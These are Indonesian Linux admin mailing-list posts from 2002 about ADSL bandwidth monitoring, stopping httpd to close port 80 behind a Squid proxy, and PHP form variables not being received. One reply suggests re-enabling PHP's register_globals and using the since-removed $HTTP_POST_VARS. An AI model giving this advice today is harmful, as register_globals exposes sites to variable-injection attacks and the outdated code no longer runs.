Salam Kantor saya berencana pake koneksi ADSL. Dimana besarnya bandwidth mesti di jaga jangan sampai over limit. Ada yg tahu, software utk melihat besarnya bandwith (down/up stream) ? sehingga kita bisa memonitor, apakah udah over quota apa belum. Terima kasih. Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] Tutup port 80
At 12:30 PM 11/11/02 +0700, you wrote: Teman-teman mungkin ada yg bisa bantu, saya sdh install squid+transparent proxy dan berjalan dg baik,tapi kok port 80 masih terbuka, bagaimana cara menutup port 80 spy nggak bisa diakses dr luar?? Matiin aja service HTTP -nya. # service httpd stop Saya juga pake transparent proxy+squid dan pake IPTABLE. CMIIW Agung Ud ".persembahkan yang terbaik dalam hidup ini ..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
Re: [admin] php tidak mau proses
At 03:48 AM 11/11/02 +0700, you wrote: Teman2 saya menggunakan RH8.0 saya telah install semua paket rpm http, php, mysql bawaan dr RedHat 8.0 tapi kenapa kok waktu saya buat program html input data, phpnya tidak mau proses data tersebut tidak ada pesan error tapi data yang diinputkan tidak bisa ditampilkan alias kosong. Kemungkinan, register_global PHP di set OFF (kalo gak salah, secara default sejak PHP 4.2.1 REGISTER_GLOBAL di OFF). Solusinya : - ubah scrip anda, utk menangkap variable, method POST = $HTTP_POST_VARS["variable-nya"] method GET = $HTTP_GET_VARS["variable-nya"] - atau anda bisa menghidupkan REGISTER_GLOBAL. cari di php.ini, register_globals = Off --->ubah menjadi register_globals = On Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
[admin] Linux Super Computer
FYI : http://news.com.com/2100-1001-963285.html?tag=fd_top --- Agung Ud "... persembahkan yang terbaik dalam hidup ini " -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
